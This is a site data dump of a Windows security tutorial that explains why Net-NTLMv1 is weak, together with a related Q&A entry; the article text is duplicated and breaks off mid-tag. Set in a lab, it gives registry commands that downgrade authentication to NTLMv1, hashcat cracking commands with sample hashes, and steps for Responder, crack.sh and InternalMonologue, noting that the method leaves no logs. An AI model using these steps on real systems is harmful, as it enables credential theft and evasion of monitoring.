[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fz3Nxz9QgjiCsDKwuclsRqXd5RwExljmU-URAXFWFf1g":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":52,"_status":50},1169,"What makes Net-NTLMv1 more vulnerable than Net-NTLMv2?","Net-NTLMv1's encryption is weaker because it splits the user's [NTLM hash](\u002Fnews\u002Fintroduction-to-windows-password-hashes-ntlm-hash-and-net-ntlm-hash) into three 7‑byte keys used for 3DES encryption of an 8‑byte Challenge. This structure allows attackers who can control the Challenge (e.g., via a man‑in‑the‑middle tool) to recover the NTLM hash in seconds using precomputed rainbow tables, as described in [the original article](\u002Fnews\u002Fintroduction-to-net-ntlmv1-password-hash-in-windows). Net‑NTLMv2 uses stronger HMAC‑MD5 and a variable Challenge, making such attacks infeasible.","\u003Cp>Net-NTLMv1&#39;s encryption is weaker because it splits the user&#39;s [NTLM hash](\u002Fnews\u002Fintroduction-to-windows-password-hashes-ntlm-hash-and-net-ntlm-hash) into three 7‑byte keys used for 3DES encryption of an 8‑byte Challenge. This structure allows attackers who can control the Challenge (e.g., via a man‑in‑the‑middle tool) to recover the NTLM hash in seconds using precomputed rainbow tables, as described in [the original article](\u002Fnews\u002Fintroduction-to-net-ntlmv1-password-hash-in-windows). Net‑NTLMv2 uses stronger HMAC‑MD5 and a variable Challenge, making such attacks infeasible.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fintroduction-to-net-ntlmv1-password-hash-in-windows\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-makes-net-ntlmv1-more-vulnerable-than-net-ntlmv2-1777480336578","Net-NTLMv1, NTLM hash, 3DES, Challenge, rainbow table, crack.sh",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},284,"Introduction to Net-NTLMv1: Password Hash in Windows","introduction-to-net-ntlmv1-password-hash-in-windows","Learn about Net-NTLMv1 encryption, vulnerabilities, and how to crack it using hashcat. Step-by-step guide for security testing in Windows environments.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Introduction to NTLM Hash and Net-NTLM Hash in Windows', we introduced NTLM hash and Net-NTLMv2 hash. As for Net-NTLMv1, the predecessor of Net-NTLMv2, it is relatively more vulnerable in terms of security. Specifically, where does its vulnerability lie? This article will provide an introduction.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Encryption method of Net-NTLMv1\u003C\u002Fli>\u003Cli>Cracking approach for Net-NTLMv1\u003C\u002Fli>\u003Cli>Exploitation approach for Net-NTLMv1\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Encryption Method of Net-NTLMv1\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Compared to Net-NTLMv2, the encryption process of Net-NTLMv2 is as follows:\u003C\u002Fp>\u003Col>\u003Cli>The client sends a request to the server\u003C\u002Fli>\u003Cli>Upon receiving the request, the server generates a 16-bit Challenge and sends it back to the client\u003C\u002Fli>\u003Cli>After receiving the Challenge, the client encrypts it using the logged-in user's password hash and sends it to the server as a response.\u003C\u002Fli>\u003Cli>The server verifies the response.\u003C\u002Fli>\u003C\u002Fol>\u003Cp>The encryption process of Net-NTLMv1 is as follows:\u003C\u002Fp>\u003Col>\u003Cli>The client sends a request to the server.\u003C\u002Fli>\u003Cli>After receiving the request, the server generates an 8-bit Challenge and sends it back to the client.\u003C\u002Fli>\u003Cli>After receiving the Challenge, the client encrypts it using the logged-in user's password hash and sends it to the server as a response.\u003C\u002Fli>\u003Cli>The server verifies the response.\u003C\u002Fli>\u003C\u002Fol>\u003Cp>The processes are the same, but the encryption algorithms differ; Net-NTLMv1 is relatively weak.\u003C\u002Fp>\u003Cp>The calculation method for Net-NTLMv1 response is relatively simple, as follows (LM hash is rarely encountered nowadays and is not considered):\u003C\u002Fp>\u003Cp>Divide the user's NTLM hash into three groups, each of 7 bits (pad with zeros at the end if the length is insufficient), and use them as the three keys for the 3DES encryption algorithm to encrypt the Challenge sent by the Server.\u003C\u002Fp>\u003Cp>For details, refer to:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fdavenport.sourceforge.net\u002Fntlm.html#theNtlmResponse\u003C\u002Fp>\u003Ch2>0x03 Cracking Approach for Net-NTLMv1\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Capture Net-NTLMv1 packets, extract key data, and use hashcat for dictionary-based cracking.\u003C\u002Fh3>\u003Cp>Server:\u003C\u002Fp>\u003Cul>\u003Cli>System: Server2008 x64\u003C\u002Fli>\u003Cli>IP: 192.168.62.144\u003C\u002Fli>\u003Cli>Login Username: log1\u003C\u002Fli>\u003Cli>Login Password: logtest123!\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Client:\u003C\u002Fp>\u003Cul>\u003Cli>System: Win7 x64\u003C\u002Fli>\u003Cli>IP: 192.168.62.137\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Modify registry to enable Net-NTLMv1:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ \u002Fv lmcompatibilitylevel \u002Ft REG_DWORD \u002Fd 0 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Since Windows Vista\u002FServer2008, Net-NTLMv1 is disabled by default, using Net-NTLMv2\u003C\u002Fp>\u003Cp>Only modify the client, no need to modify the server\u003C\u002Fp>\u003Cp>Client remotely connects to the server via command line, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net use \\\\192.168.62.144 \u002Fu:log1 logtest123!\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Accessing the file share at \\\\192.168.62.144 via the interface requires an additional verification step, using the current user's password for authentication.\u003C\u002Fp>\u003Cp>Run Wireshark on the client to capture packets, as shown below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016721003_0_afd7609ce8.jpeg\">\u003C\u002Fp>\u003Cp>The first four packets correspond to the four steps of NTLM authentication.\u003C\u002Fp>\u003Cp>Examine the second packet to obtain the Challenge, which is 8d2da0f5e21e20ee, as shown below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016727113_1_e8f9190c8f.jpeg\">\u003C\u002Fp>\u003Cp>Examine the third packet to obtain the LM Response data as fec9b082080e34ba00000000000000000000000000000000, the NTLM Response data as 51acb9f9909f0e3c4254c332f5e302a38429c5490206bc04, the username as a, and the hostname as WIN-BH7SVRRDGVA, as shown below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016731647_2_d5694b557b.jpeg\">\u003C\u002Fp>\u003Cp>Here is a comparison: if it were Net-NTLMv2, the Response data would include an additional NTLMv2 Response, as shown below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016735525_3_1d62b0dcbc.jpeg\">\u003C\u002Fp>\u003Cp>Next, use Hashcat to crack this Net-NTLM v1.\u003C\u002Fp>\u003Cp>The format for NTLMv1 is:\u003C\u002Fp>\u003Cp>username::hostname:LM response:NTLM response:challenge\u003C\u002Fp>\u003Cp>The constructed data is as follows:\u003C\u002Fp>\u003Cp>log1::WIN-BH7SVRRDGVA:fec9b082080e34ba00000000000000000000000000000000:51acb9f9909f0e3c4254c332f5e302a38429c5490206bc04:8d2da0f5e21e20ee\u003C\u002Fp>\u003Cp>The Hashcat parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>hashcat -m 5500 log1::WIN-BH7SVRRDGVA:fec9b082080e34ba00000000000000000000000000000000:51acb9f9909f0e3c4254c332f5e302a38429c5490206bc04:8d2da0f5e21e20ee \u002Ftmp\u002Fpassword.list -o found.txt --force\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Explanation:\u003C\u002Fp>\u003Cp>-m: hash-type, 5500 corresponds to NetNTLMv1. Detailed parameters can be checked in the table: https:\u002F\u002Fhashcat.net\u002Fwiki\u002Fdoku.php?\u003C\u002Fp>\u003Cp>-o: output file. The dictionary file is \u002Ftmp\u002Fpassword.list\u003C\u002Fp>\u003Cp>--force means force execution, as the test system does not support Intel OpenCL\u003C\u002Fp>\u003Cp>Successfully cracked the plaintext login password, output as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016738514_4_7427666ed6.jpeg\">\u003C\u002Fp>\u003Ch3>2. Use man-in-the-middle attack tools like Responder to control the Challenge to a fixed value 1122334455667788\u003C\u002Fh3>\u003Cp>The NTLM hash of the password can be restored using rainbow tables\u003C\u002Fp>\u003Cp>For example, the following NetNTLMv1 hash was obtained:\u003C\u002Fp>\u003Cp>a::WIN-BH7SVRRDGVA:aebc606d66e80ea649198ed339bda8cd7872c227d6baf33a:aebc606d66e80ea649198ed339bda8cd7872c227d6baf33a:1122334455667788\u003C\u002Fp>\u003Cp>The LM hash is aebc606d66e80ea649198ed339bda8cd7872c227d6baf33a\u003C\u002Fp>\u003Cp>Visit the website https:\u002F\u002Fcrack.sh\u002Fget-cracking\u002F and use the free rainbow tables for cracking\u003C\u002Fp>\u003Cp>The format to be filled in is as follows:\u003C\u002Fp>\u003Cp>NTHASH:aebc606d66e80ea649198ed339bda8cd7872c227d6baf33a\u003C\u002Fp>\u003Cp>Then enter the email address. After submission, you will receive an email within a short time (within 1 minute) indicating successful cracking.\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fcrack.sh\u002Fnetntlm\u002F\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016742022_5_2d6d0b0908.jpeg\">\u003C\u002Fp>\u003Cp>The cracked NTLM hash is d25ecd13fddbb542d2e16da4f9e0333d, taking 45 seconds.\u003C\u002Fp>\u003Cp>Using mimikatz to obtain the user's NTLM hash, the comparison results are the same, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016745549_6_540dc46298.jpeg\">\u003C\u002Fp>\u003Ch2>0x04 Exploitation Approach for Net-NTLMv1\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Due to the vulnerability of Net-NTLMv1, after controlling the Challenge, the user's NTLM hash can be restored via rainbow tables in a short time. Therefore, the preferred exploitation method is to downgrade the default Net-NTLMv2 in the Win7 environment to Net-NTLMv1, capture the local communication data, restore the NTLM hash, and implement the tool: InternalMonologue.\u003C\u002Fp>\u003Cp>Download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Feladshamir\u002FInternal-Monologue\u003C\u002Fp>\u003Cp>Downgrade Net-NTLMv2 to Net-NTLMv1 by modifying the registry, obtain the token of the running user, simulate user interaction with the NTLM SSP, set the Challenge to a fixed value of 1122334455667788, and export the returned Net-NTLMv1 response\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Modifying the registry requires administrator privileges\u003C\u002Fp>\u003Cp>Modify the registry to enable Net-NTLMv1:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ \u002Fv lmcompatibilitylevel \u002Ft REG_DWORD \u002Fd 2 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To ensure Net-NTLMv1 is successfully enabled, two additional registry key values need to be modified:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\\ \u002Fv NtlmMinClientSec \u002Ft REG_DWORD \u002Fd 536870912 \u002Ff\u003Cbr>reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\\ \u002Fv RestrictSendingNTLMTraffic \u002Ft REG_DWORD \u002Fd 0 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The obtained results can be cracked using free rainbow tables by visiting the website https:\u002F\u002Fcrack.sh\u002Fget-cracking\u002F, which will not be elaborated further\u003C\u002Fp>\u003Cp>\u003Cstrong>Advantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Col>\u003Cli>This method does not involve operations on the lsass.exe process\u003C\u002Fli>\u003Cli>Interacts with the local NTLM SSP without generating network traffic\u003C\u002Fli>\u003Cli>No NTLM authentication is performed, thus no logs are generated\u003C\u002Fli>\u003C\u002Fol>\u003Cp>\u003Cstrong>Supplement:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If InternalMonologue is executed with standard user privileges, it can obtain Net-NTLMv2 packets for the current user's permissions. Cracking these with hashcat can reveal the plaintext password of the current user\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016747600_7_9781afa6b7.jpeg\">\u003C\u002Fp>\u003Cp>As shown in the figure above, the captured Net-NTLMv2 packet is as follows:\u003C\u002Fp>\u003Cp>a::WIN-BH7SVRRDGVA:1122334455667788:db18ac502e829dfab120e78c041e2f87:01010000000000008e2ddebb92c2d30175f9bda99183337900000000020000000000000000000000\u003C\u002Fp>\u003Cp>Using hashcat for dictionary cracking with the following parameters:\u003C\u002Fp>\u003Cp>hashcat -m 5600 a::WIN-BH7SVRRDGVA:1122334455667788:db18ac502e829dfab120e78c041e2f87:01010000000000008e2ddebb92c2d30175f9bda99183337900000000020000000000000000000000 \u002Ftmp\u002Fpassword.list --force\u003C\u002Fp>\u003Cp>Successfully cracked, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016749250_8_ca4b94bfdd.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016750820_9_2ffbf0a20f.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Defense Strategy\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Since Windows Vista, Microsoft has defaulted to using the Net-NTLMv2 protocol. To downgrade to Net-NTLMv1, administrator privileges on the current system are first required.\u003C\u002Fp>\u003Cp>For the Net-NTLMv2 protocol, even if communication packets are captured, only dictionary attacks or brute-force cracking can be attempted, with a relatively low probability of success.\u003C\u002Fp>\u003Cp>In summary, since Windows Vista, the default Net-NTLMv2 protocol provides sufficient security assurance.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the encryption methods and cracking approaches of Net-NTLMv1, analyzes and tests the tool InternalMonologue, which can obtain Net-NTLMv2 data under regular user permissions—a highly impressive feature.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Introduction to NTLM Hash and Net-NTLM Hash in Windows', we introduced NTLM hash and Net-NTLMv2 hash. As for Net-NTLMv1, the predecessor of Net-NTLMv2, it is relatively more vulnerable in terms of security. Specifically, where does its vulnerability lie? This article will provide an introduction.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Encryption method of Net-NTLMv1\u003C\u002Fli>\u003Cli>Cracking approach for Net-NTLMv1\u003C\u002Fli>\u003Cli>Exploitation approach for Net-NTLMv1\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Encryption Method of Net-NTLMv1\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Compared to Net-NTLMv2, the encryption process of Net-NTLMv2 is as follows:\u003C\u002Fp>\u003Col>\u003Cli>The client sends a request to the server\u003C\u002Fli>\u003Cli>Upon receiving the request, the server generates a 16-bit Challenge and sends it back to the client\u003C\u002Fli>\u003Cli>After receiving the Challenge, the client encrypts it using the logged-in user's password hash and sends it to the server as a response.\u003C\u002Fli>\u003Cli>The server verifies the response.\u003C\u002Fli>\u003C\u002Fol>\u003Cp>The encryption process of Net-NTLMv1 is as follows:\u003C\u002Fp>\u003Col>\u003Cli>The client sends a request to the server.\u003C\u002Fli>\u003Cli>After receiving the request, the server generates an 8-bit Challenge and sends it back to the client.\u003C\u002Fli>\u003Cli>After receiving the Challenge, the client encrypts it using the logged-in user's password hash and sends it to the server as a response.\u003C\u002Fli>\u003Cli>The server verifies the response.\u003C\u002Fli>\u003C\u002Fol>\u003Cp>The processes are the same, but the encryption algorithms differ; Net-NTLMv1 is relatively weak.\u003C\u002Fp>\u003Cp>The calculation method for Net-NTLMv1 response is relatively simple, as follows (LM hash is rarely encountered nowadays and is not considered):\u003C\u002Fp>\u003Cp>Divide the user's NTLM hash into three groups, each of 7 bits (pad with zeros at the end if the length is insufficient), and use them as the three keys for the 3DES encryption algorithm to encrypt the Challenge sent by the Server.\u003C\u002Fp>\u003Cp>For details, refer to:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fdavenport.sourceforge.net\u002Fntlm.html#theNtlmResponse\u003C\u002Fp>\u003Ch2>0x03 Cracking Approach for Net-NTLMv1\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Capture Net-NTLMv1 packets, extract key data, and use hashcat for dictionary-based cracking.\u003C\u002Fh3>\u003Cp>Server:\u003C\u002Fp>\u003Cul>\u003Cli>System: Server2008 x64\u003C\u002Fli>\u003Cli>IP: 192.168.62.144\u003C\u002Fli>\u003Cli>Login Username: log1\u003C\u002Fli>\u003Cli>Login Password: logtest123!\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Client:\u003C\u002Fp>\u003Cul>\u003Cli>System: Win7 x64\u003C\u002Fli>\u003Cli>IP: 192.168.62.137\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Modify registry to enable Net-NTLMv1:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ \u002Fv lmcompatibilitylevel \u002Ft REG_DWORD \u002Fd 0 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Since Windows Vista\u002FServer2008, Net-NTLMv1 is disabled by default, using Net-NTLMv2\u003C\u002Fp>\u003Cp>Only modify the client, no need to modify the server\u003C\u002Fp>\u003Cp>Client remotely connects to the server via command line, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net use \\\\192.168.62.144 \u002Fu:log1 logtest123!\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Accessing the file share at \\\\192.168.62.144 via the interface requires an additional verification step, using the current user's password for authentication.\u003C\u002Fp>\u003Cp>Run Wireshark on the client to capture packets, as shown below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016721003_0_afd7609ce8-1.jpeg\">\u003C\u002Fp>\u003Cp>The first four packets correspond to the four steps of NTLM authentication.\u003C\u002Fp>\u003Cp>Examine the second packet to obtain the Challenge, which is 8d2da0f5e21e20ee, as shown below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016727113_1_e8f9190c8f-1.jpeg\">\u003C\u002Fp>\u003Cp>Examine the third packet to obtain the LM Response data as fec9b082080e34ba00000000000000000000000000000000, the NTLM Response data as 51acb9f9909f0e3c4254c332f5e302a38429c5490206bc04, the username as a, and the hostname as WIN-BH7SVRRDGVA, as shown below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016731647_2_d5694b557b-1.jpeg\">\u003C\u002Fp>\u003Cp>Here is a comparison: if it were Net-NTLMv2, the Response data would include an additional NTLMv2 Response, as shown below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016735525_3_1d62b0dcbc-1.jpeg\">\u003C\u002Fp>\u003Cp>Next, use Hashcat to crack this Net-NTLM v1.\u003C\u002Fp>\u003Cp>The format for NTLMv1 is:\u003C\u002Fp>\u003Cp>username::hostname:LM response:NTLM response:challenge\u003C\u002Fp>\u003Cp>The constructed data is as follows:\u003C\u002Fp>\u003Cp>log1::WIN-BH7SVRRDGVA:fec9b082080e34ba00000000000000000000000000000000:51acb9f9909f0e3c4254c332f5e302a38429c5490206bc04:8d2da0f5e21e20ee\u003C\u002Fp>\u003Cp>The Hashcat parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>hashcat -m 5500 log1::WIN-BH7SVRRDGVA:fec9b082080e34ba00000000000000000000000000000000:51acb9f9909f0e3c4254c332f5e302a38429c5490206bc04:8d2da0f5e21e20ee \u002Ftmp\u002Fpassword.list -o found.txt --force\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Explanation:\u003C\u002Fp>\u003Cp>-m: hash-type, 5500 corresponds to NetNTLMv1. Detailed parameters can be checked in the table: https:\u002F\u002Fhashcat.net\u002Fwiki\u002Fdoku.php?\u003C\u002Fp>\u003Cp>-o: output file. The dictionary file is \u002Ftmp\u002Fpassword.list\u003C\u002Fp>\u003Cp>--force means force execution, as the test system does not support Intel OpenCL\u003C\u002Fp>\u003Cp>Successfully cracked the plaintext login password, output as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016738514_4_7427666ed6-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Use man-in-the-middle attack tools like Responder to control the Challenge to a fixed value 1122334455667788\u003C\u002Fh3>\u003Cp>The NTLM hash of the password can be restored using rainbow tables\u003C\u002Fp>\u003Cp>For example, the following NetNTLMv1 hash was obtained:\u003C\u002Fp>\u003Cp>a::WIN-BH7SVRRDGVA:aebc606d66e80ea649198ed339bda8cd7872c227d6baf33a:aebc606d66e80ea649198ed339bda8cd7872c227d6baf33a:1122334455667788\u003C\u002Fp>\u003Cp>The LM hash is aebc606d66e80ea649198ed339bda8cd7872c227d6baf33a\u003C\u002Fp>\u003Cp>Visit the website https:\u002F\u002Fcrack.sh\u002Fget-cracking\u002F and use the free rainbow tables for cracking\u003C\u002Fp>\u003Cp>The format to be filled in is as follows:\u003C\u002Fp>\u003Cp>NTHASH:aebc606d66e80ea649198ed339bda8cd7872c227d6baf33a\u003C\u002Fp>\u003Cp>Then enter the email address. After submission, you will receive an email within a short time (within 1 minute) indicating successful cracking.\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fcrack.sh\u002Fnetntlm\u002F\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016742022_5_2d6d0b0908-1.jpeg\">\u003C\u002Fp>\u003Cp>The cracked NTLM hash is d25ecd13fddbb542d2e16da4f9e0333d, taking 45 seconds.\u003C\u002Fp>\u003Cp>Using mimikatz to obtain the user's NTLM hash, the comparison results are the same, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016745549_6_540dc46298-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x04 Exploitation Approach for Net-NTLMv1\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Due to the vulnerability of Net-NTLMv1, after controlling the Challenge, the user's NTLM hash can be restored via rainbow tables in a short time. Therefore, the preferred exploitation method is to downgrade the default Net-NTLMv2 in the Win7 environment to Net-NTLMv1, capture the local communication data, restore the NTLM hash, and implement the tool: InternalMonologue.\u003C\u002Fp>\u003Cp>Download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Feladshamir\u002FInternal-Monologue\u003C\u002Fp>\u003Cp>Downgrade Net-NTLMv2 to Net-NTLMv1 by modifying the registry, obtain the token of the running user, simulate user interaction with the NTLM SSP, set the Challenge to a fixed value of 1122334455667788, and export the returned Net-NTLMv1 response\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Modifying the registry requires administrator privileges\u003C\u002Fp>\u003Cp>Modify the registry to enable Net-NTLMv1:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ \u002Fv lmcompatibilitylevel \u002Ft REG_DWORD \u002Fd 2 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To ensure Net-NTLMv1 is successfully enabled, two additional registry key values need to be modified:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\\ \u002Fv NtlmMinClientSec \u002Ft REG_DWORD \u002Fd 536870912 \u002Ff\u003Cbr>reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\\ \u002Fv RestrictSendingNTLMTraffic \u002Ft REG_DWORD \u002Fd 0 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The obtained results can be cracked using free rainbow tables by visiting the website https:\u002F\u002Fcrack.sh\u002Fget-cracking\u002F, which will not be elaborated further\u003C\u002Fp>\u003Cp>\u003Cstrong>Advantages:\u003C\u002Fstrong>\u003C\u002Fp>\u003Col>\u003Cli>This method does not involve operations on the lsass.exe process\u003C\u002Fli>\u003Cli>Interacts with the local NTLM SSP without generating network traffic\u003C\u002Fli>\u003Cli>No NTLM authentication is performed, thus no logs are generated\u003C\u002Fli>\u003C\u002Fol>\u003Cp>\u003Cstrong>Supplement:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If InternalMonologue is executed with standard user privileges, it can obtain Net-NTLMv2 packets for the current user's permissions. Cracking these with hashcat can reveal the plaintext password of the current user\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016747600_7_9781afa6b7-1.jpeg\">\u003C\u002Fp>\u003Cp>As shown in the figure above, the captured Net-NTLMv2 packet is as follows:\u003C\u002Fp>\u003Cp>a::WIN-BH7SVRRDGVA:1122334455667788:db18ac502e829dfab120e78c041e2f87:01010000000000008e2ddebb92c2d30175f9bda99183337900000000020000000000000000000000\u003C\u002Fp>\u003Cp>Using hashcat for dictionary cracking with the following parameters:\u003C\u002Fp>\u003Cp>hashcat -m 5600 a::WIN-BH7SVRRDGVA:1122334455667788:db18ac502e829dfab120e78c041e2f87:01010000000000008e2ddebb92c2d30175f9bda99183337900000000020000000000000000000000 \u002Ftmp\u002Fpassword.list --force\u003C\u002Fp>\u003Cp>Successfully cracked, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" 